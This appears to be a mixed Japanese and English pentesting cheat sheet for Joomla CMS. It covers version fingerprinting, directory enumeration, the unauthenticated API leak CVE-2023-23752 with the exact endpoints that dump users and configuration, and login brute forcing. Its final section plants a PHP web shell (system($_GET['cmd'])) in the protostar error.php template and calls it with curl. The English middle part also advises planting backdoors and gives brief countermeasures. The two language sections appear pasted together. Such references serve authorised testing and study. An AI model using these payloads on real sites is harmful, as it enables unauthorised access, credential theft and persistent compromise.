Joomla
Joomlaの統計情報
Joomlaは、Joomlaのインストールで使用されているJoomla、PHP、データベースバージョン、およびサーバーのオペレーティングシステムの分析など、いくつかの匿名の使用統計情報を収集しています。このデータは、彼らの公開APIを介してクエリできます。
列挙
発見/フットプリンティング
metaをチェック
robots.txt
README.txt
Joomla
Information Gathering
Version Detection
To detect the version of Joomla running on a target website, you can look for version information in the HTML source code or check the readme.html
file in the Joomla root directory.
Directory Enumeration
Use tools like DirBuster or Gobuster to enumerate directories and files on the Joomla website. Look for sensitive directories like /administrator
or /components
.
Exploitation
Known Vulnerabilities
Search for known vulnerabilities affecting the detected Joomla version on platforms like Exploit Database or CVE Details. Exploit these vulnerabilities to gain unauthorized access.
SQL Injection
Exploit SQL injection vulnerabilities in Joomla components or plugins to extract data from the website's database. Use tools like SQLMap to automate the process.
Post-Exploitation
Privilege Escalation
After gaining initial access, escalate privileges by exploiting misconfigurations, weak file permissions, or other vulnerabilities in the Joomla installation.
Backdooring
Plant a backdoor in the Joomla website to maintain access even if the original vulnerability used for exploitation is patched. Use tools like Metasploit to create and deploy backdoors.
Countermeasures
Keep Joomla Updated
Regularly update Joomla to the latest version to patch known vulnerabilities and protect the website from exploitation.
Use Strong Authentication
Implement strong authentication mechanisms like two-factor authentication to prevent unauthorized access to the Joomla admin panel.
Monitor File Changes
Monitor file integrity and changes in the Joomla installation to detect any unauthorized modifications or backdoors planted by attackers.
バージョン
/administrator/manifests/files/joomla.xml にバージョンが記載されています。
/language/en-GB/en-GB.xml にJoomlaのバージョンが記載されています。
plugins/system/cache/cache.xml におおよそのバージョンが記載されています。
In 80,443 - Pentesting Web Methodologyは、JoomlaをスキャンできるCMSスキャナに関するセクションです。
API認証なしの情報漏洩:
バージョン4.0.0から4.2.7までが認証なしの情報漏洩(CVE-2023-23752)に脆弱であり、資格情報やその他の情報をダンプします。
ユーザー:
http://<host>/api/v1/users?public=true
設定ファイル:
http://<host>/api/index.php/v1/config/application?public=true
MSFモジュール:scanner/http/joomla_api_improper_access_checks
またはrubyスクリプト:51334
ブルートフォース
ログインをブルートフォースするために、このスクリプトを使用できます。
RCE
管理者資格情報を取得した場合、PHPコードのスニペットを追加してRCEを獲得できます。これはテンプレートをカスタマイズすることで行います。
Configuration
の下にある**Templates
**をクリックして、テンプレートメニューを表示します。Template
列ヘッダーの下にある**protostar
を選択して、Templates: Customise
**ページに移動します。最後に、ページソースを表示するためにページをクリックします。
error.php
ページを選択し、以下のようにPHPのワンライナーを追加してコード実行を行います:system($_GET['cmd']);
保存して閉じる
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
Last updated